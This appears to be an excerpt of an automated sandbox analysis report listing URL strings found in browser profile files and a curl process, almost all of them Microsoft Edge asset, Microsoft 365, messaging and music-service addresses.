      Source: manifest.json0.12.drString found in binary or memory: https://drive-daily-5.corp.google.com/
      Source: manifest.json0.12.drString found in binary or memory: https://drive-daily-6.corp.google.com/
      Source: manifest.json0.12.drString found in binary or memory: https://drive-preprod.corp.google.com/
      Source: manifest.json0.12.drString found in binary or memory: https://drive-staging.corp.google.com/
      Source: manifest.json0.12.drString found in binary or memory: https://drive.google.com/
      Source: Web Data.12.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: Web Data.12.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: Web Data.12.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: 000003.log6.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
      Source: 000003.log6.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
      Source: 000003.log6.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
      Source: 000003.log4.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
      Source: HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
      Source: HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr, HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
      Source: HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
      Source: 000003.log6.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.dr, HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
      Source: HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
      Source: HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
      Source: HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
      Source: 000003.log6.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://gaana.com/
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://m.kugou.com/
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://m.soundcloud.com/
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://m.vk.com/
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://music.amazon.com
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://music.apple.com
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://music.yandex.com
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://open.spotify.com
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://outlook.live.com/mail/0/
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://outlook.office.com/mail/0/
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
      Source: Session_13385853608423166.12.drString found in binary or memory: https://s28.q4cdn.com
      Source: 000003.log.12.drString found in binary or memory: https://s28.q4cdn.com/
      Source: Session_13385853608423166.12.dr, History.12.drString found in binary or memory: https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf
      Source: History.12.drString found in binary or memory: https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdfThis
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://tidal.com/
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://twitter.com/
      Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
      Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
      Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://vibe.naver.com/today
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://web.telegram.org/
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://web.whatsapp.com
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
      Source: curl.exe, 00000006.00000003.1291868369.000001BE71260000.00000004.00000020.00020000.00000000.sdmp, bosfortuy.ms.6.drString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
      Source: curl.exe, 00000006.00000003.1291868369.000001BE71260000.00000004.00000020.00020000.00000000.sdmp, bosfortuy.ms.6.drString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.deezer.com/
      Source: content.js.12.dr, content_new.js.12.drString found in binary or memory: https://www.google.com/chrome
      Source: Web Data.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.iheart.com/podcast/
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.instagram.com
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.last.fm/
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.messenger.com
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
